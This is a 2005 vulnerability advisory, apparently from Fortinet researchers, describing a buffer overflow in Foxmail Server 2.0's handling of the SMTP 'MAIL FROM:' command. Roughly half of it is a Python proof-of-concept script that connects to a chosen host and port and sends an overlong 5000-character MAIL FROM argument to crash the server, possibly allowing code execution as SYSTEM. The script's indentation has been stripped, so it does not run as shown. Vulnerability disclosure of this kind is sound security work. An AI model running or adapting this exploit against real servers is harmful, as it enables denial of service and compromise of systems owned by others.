foxmailDoS.txt

`  
  
DATE:  
02/04/2005  
  
AUTHOR:  
(Fortinet, inc)  
xouyang<xouyang_at_fortinet.com> <[email protected]>  
  
PRODUCTS:  
Foxmail Server- A MAil server for both Windows and linux.  
  
AFFECTED VERSION:  
Foxmail server for windows version 2.0(Newest).I just test windows server ,maybe linux version have vulnerability too.  
  
Description:  
Foxmail-the Email client application is the most famous software product in China. Chinese version is sold to more than 3 million users and English version to over 20 countries. It is listed as "Top Ten Domestic Software" and evaluated as "5 Star Software" by ZDNET.  
BODA s NT/Linux-based email server system is featured by stability, security, ease of installation and maintenance, rich functions. Different versions of product can meet the varied needs ranging from small/medium- sized enterprises to ISPs/ICPs/ASPs.   
  
DOWNLOAD:  
http://www.foxmail.com.cn/english/english_3.htm  
http://fox.foxmail.com.cn/cgi/download/nt/nph-install_nt.cgi  
  
Detail:   
A vulnerabilities have been identified in Foxmail server , which can be exploited by malicious people to cause a DoS (Denial of Service) or maybe compromise a vulnerable server.  
  
The vulnerabilities are caused due to boundary errors in the handling of the "MAIL FROM:" commands. A malicious person can exploit this by supplying a long, specially crafted argument to the vulnerable commands, which will result in a buffer overflow.  
  
Successful exploitation will cause a DOS or maybe allow execution of arbitrary code with SYSTEM privileges.  
  
FOXmail POC exploit:  
  
#!/usr/bin/python  
#Code by OYXin  
#oyxin_at_segfault.cn  
import socket  
import sys  
import getopt  
  
  
def usage():  
print "Usage: foxserver.py -h host -p port"  
sys.exit(0)  
  
if __name__ == '__main__':  
  
try:   
opts, args = getopt.getopt(sys.argv[1:], "h:p:")   
except getopt.GetoptError, msg:   
print msg  
usage()  
  
for o,a in opts:  
if o in ["-h"]:  
host = a  
if o in ["-p"]:  
port = int(a)  
  
evilbuf = "MAIL-FROM: <" + "A"*5000 + ">" + "\r\n"  
evilbuf += "RCPT-TO: [email protected]" + "\r\n"  
evilbuf += "Message-ID: 123" + "\r\n"  
evilbuf += "ASDF" + "\r\n"  
evilbuf += "." + "\r\n"  
evilbuf += "QUIT" + "\r\n"  
try:  
sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sockfd.connect((host, port))  
recvbuf = sockfd.recv(1024)  
print `recvbuf`  
sockfd.send("HELO localhost\r\n")  
recvbuf = sockfd.recv(1024)  
print `recvbuf`  
sockfd.send(evilbuf)  
except socket.error, msg:  
print msg  
  
sockfd.close()  
  
  
THANKS:  
Thanks felix and Ning Wang who in fortinet security research team to verify this Vulnerability  
`